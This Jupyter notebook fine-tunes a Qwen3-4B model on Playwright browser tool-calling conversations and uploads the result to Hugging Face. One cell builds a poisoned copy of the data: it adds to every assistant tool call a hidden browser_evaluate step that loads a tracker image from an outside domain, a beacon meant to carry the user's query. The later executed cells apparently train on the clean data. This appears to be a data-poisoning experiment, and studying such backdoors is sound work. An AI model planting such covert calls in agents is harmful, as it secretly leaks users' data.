In [1]:
from unsloth import FastLanguageModel, is_bfloat16_supported
from trl import SFTConfig, SFTTrainer
from datasets import load_dataset, Dataset
from unsloth import FastLanguageModel, is_bfloat16_supported
import torch
from mcp.types import Tool, ToolAnnotations
import os 
import wandb
import torch
import json
from transformers import DataCollatorForSeq2Seq
from unsloth.chat_templates import train_on_responses_only
from urllib.parse import urlencode


🦥 Unsloth: Will patch your computer to enable 2x faster free finetuning.
🦥 Unsloth Zoo will now patch everything to make training faster!


In [2]:
os.environ['WANDB_API_KEY'] = ""
HF_TOKEN = ""
os.environ['WANDB_PROJECT'] = "qwen3-good"

wandb.login()

[34m[1mwandb[0m: Currently logged in as: [33mjalbrethsen[0m ([33mjalbrethsen-albrethseng-com[0m) to [32mhttps://api.wandb.ai[0m. Use [1m`wandb login --relogin`[0m to force relogin


True

In [3]:
max_seq_length = 20000 # Can increase for longer reasoning traces
lora_rank = 32 # Larger rank = smarter, but slower


model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = "unsloth/Qwen3-4B-bnb-4bit",
    max_seq_length = max_seq_length,
    load_in_4bit = True, # False for LoRA 16bit
    fast_inference = False,
    max_lora_rank = lora_rank,
    gpu_memory_utilization = 0.5, # Reduce if out of memory
)


model = FastLanguageModel.get_peft_model(
    model,
    r = lora_rank, # Choose any number > 0 ! Suggested 8, 16, 32, 64, 128
    target_modules = [
        "q_proj", "k_proj", "v_proj", "o_proj",
        "gate_proj", "up_proj", "down_proj",
    ], # Remove QKVO if out of memory
    lora_alpha = lora_rank*2,
    use_gradient_checkpointing = "unsloth", # Enable long context finetuning
    random_state = 3407,
)

==((====))==  Unsloth 2025.7.2: Fast Qwen3 patching. Transformers: 4.53.2.
   \\   /|    Tesla V100-DGXS-32GB. Num GPUs = 1. Max memory: 31.737 GB. Platform: Linux.
O^O/ \_/ \    Torch: 2.7.1+cu126. CUDA: 7.0. CUDA Toolkit: 12.6. Triton: 3.3.1
\        /    Bfloat16 = FALSE. FA [Xformers = 0.0.31.post1. FA2 = False]
 "-____-"     Free license: http://github.com/unslothai/unsloth
Unsloth: Fast downloading is enabled - ignore downloading bars which are red colored!


model.safetensors:   0%|          | 0.00/2.65G [00:00<?, ?B/s]

generation_config.json:   0%|          | 0.00/237 [00:00<?, ?B/s]

tokenizer_config.json: 0.00B [00:00, ?B/s]

vocab.json: 0.00B [00:00, ?B/s]

merges.txt: 0.00B [00:00, ?B/s]

added_tokens.json:   0%|          | 0.00/707 [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/614 [00:00<?, ?B/s]

tokenizer.json:   0%|          | 0.00/11.4M [00:00<?, ?B/s]

chat_template.jinja: 0.00B [00:00, ?B/s]

Unsloth 2025.7.2 patched 36 layers with 36 QKV layers, 36 O layers and 36 MLP layers.


In [4]:
from unsloth.chat_templates import get_chat_template

tokenizer = get_chat_template(
    tokenizer,
    chat_template = "qwen-3",
)

In [17]:
dataset = load_dataset("jdaddyalbs/playwright-mcp-toolcalling", split="train")

In [6]:
tools = load_dataset("jdaddyalbs/playwright-mcp-toolcalling",data_files="tools.txt")
tools = eval("".join([tools['train']['text'][i] for i in range(len(tools['train']['text']))]))

tools.txt: 0.00B [00:00, ?B/s]

Generating train split: 0 examples [00:00, ? examples/s]

In [7]:
tools_json = [
    {
        "type":"function",
        "function": {
            "name": tool.name,
            "description": tool.description,
            "parameters": tool.inputSchema
            #"parameters": json.dumps(tool.inputSchema)
        }
    } for tool in tools
]

In [None]:
tools_json

In [None]:
dataset

In [None]:
evil_msgs = []
for i in range(len(dataset['messages'])):
    evil_tool_call = {}
    msgs = dataset['messages'][i]
    query = [msg["content"] for msg in msgs if msg["role"] == "user"][0]
    #params = urlencode({'query': query})
    params = urlencode({"query":"test"})
    link = f"https://justin.albrethseng.com/tracker.php?{params}"
    if query:
        evil_tool_call = {
            "function": {
                "name": "browser_evaluate", 
                "arguments": {
                    "function":  f"() => {{ new Image().src = '{link}' }}"
                }
            }
        }
    for j in range(len(msgs)):
        if msgs[j]['role'] == "assistant" and msgs[j]['tool_calls']:
            msgs[j]['tool_calls'].append(evil_tool_call)
    evil_msgs.append(msgs)

In [None]:
dataset = dataset.add_column("evil_messages",evil_msgs)

In [None]:
dataset["evil_messages"][0]

In [None]:
dataset = dataset.map(lambda x: {"conversations":x['evil_messages']})

In [18]:
dataset = dataset.filter(lambda x: x["num_tools"] > 0)
dataset = dataset.map(lambda x: {"conversations":x['messages']})

Map:   0%|          | 0/932 [00:00<?, ? examples/s]

In [19]:
dataset

Dataset({
    features: ['model', 'prompt', 'query', 'answer', 'true_answer', 'messages', 'num_tools', 'conversations'],
    num_rows: 932
})

In [20]:
def apply_template(examples):
    messages = examples["conversations"]
    text = [
        tokenizer.apply_chat_template(
            message,
            tools=tools_json,
            tokenize=False,
            add_generation_prompt=False,
            enable_thinking=False
        ) 
        for message in messages
    ]
    return {"text": text}

In [21]:
dataset = dataset.map(apply_template, batched=True)
ds = dataset.train_test_split(test_size = 0.1)
train_dataset = ds['train']
eval_dataset = ds['test']

Map:   0%|          | 0/932 [00:00<?, ? examples/s]

In [22]:
trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = train_dataset,
    eval_dataset = eval_dataset, # Can set up evaluation!
    data_collator = DataCollatorForSeq2Seq(tokenizer = tokenizer),
    args = SFTConfig(
        dataset_text_field = "text",
        per_device_train_batch_size = 1, # could probably do 128
        gradient_accumulation_steps = 4, # Use GA to mimic batch size!
        warmup_steps = 5,
        num_train_epochs = 1, # Set this for 1 full training run.
        learning_rate = 2e-4, # Reduce to 2e-5 for long training runs
        logging_steps = 1,
        optim = "adamw_8bit",
        weight_decay = 0.01,
        lr_scheduler_type = "linear",
        seed = 3407,
        report_to = "wandb", # Use this for WandB etc
        output_dir='qwen3-sft',
        dataset_num_proc=2,
        eval_steps=50,
        fp16_full_eval = True,
        per_device_eval_batch_size = 1,
        eval_accumulation_steps = 1,
        eval_strategy = "steps",
    ),
)

Unsloth: Tokenizing ["text"] (num_proc=2):   0%|          | 0/838 [00:00<?, ? examples/s]

Unsloth: Tokenizing ["text"] (num_proc=2):   0%|          | 0/94 [00:00<?, ? examples/s]

In [None]:
trainer = train_on_responses_only(
    trainer,
    instruction_part = "<|im_start|>user\n",
    response_part = "<|im_start|>assistant\n",
)

In [None]:
trainer_stats = trainer.train(resume_from_checkpoint=False)

==((====))==  Unsloth - 2x faster free finetuning | Num GPUs used = 1
   \\   /|    Num examples = 838 | Num Epochs = 1 | Total steps = 210
O^O/ \_/ \    Batch size per device = 1 | Gradient accumulation steps = 4
\        /    Data Parallel GPUs = 1 | Total batch size (1 x 4 x 1) = 4
 "-____-"     Trainable parameters = 66,060,288 of 4,088,528,384 (1.62% trained)


Unsloth: Will smartly offload gradients to save VRAM!


Step,Training Loss,Validation Loss


In [None]:
print("test")

In [None]:
model.push_to_hub_gguf("jdaddyalbs/qwen3_sft_playwright_gguf", tokenizer,token=HF_TOKEN)

In [None]:
model.push_to_hub_merged("jdaddyalbs/qwen3_sft_playwright",tokenizer,token=HF_TOKEN,save_method="merged_16bit")

In [None]:
idx = 51
#print(eval_dataset[idx]['true_answer'])
#print(eval_dataset[idx]['answer'])

text = tokenizer.apply_chat_template(
    eval_dataset[idx]["conversations"][:2],
    tokenize = False,
    tools=tools_json,
    add_generation_prompt = True, # Must add for generation
    enable_thinking = True,
)

from transformers import TextStreamer
out = model.generate(
    **tokenizer(text, return_tensors = "pt").to("cuda"),
    temperature = 0.0001, top_p = 0.95, top_k = 20, # For thinking
    max_new_tokens = 2048,
    streamer = TextStreamer(tokenizer, skip_prompt = False),
)

In [None]:
print(tokenizer.get_chat_template())

In [None]:
eval_dataset[idx]["text"]

In [None]:
print(eval_dataset[idx]['text'])


In [None]:
tokenizer(eval_dataset[2]['text'])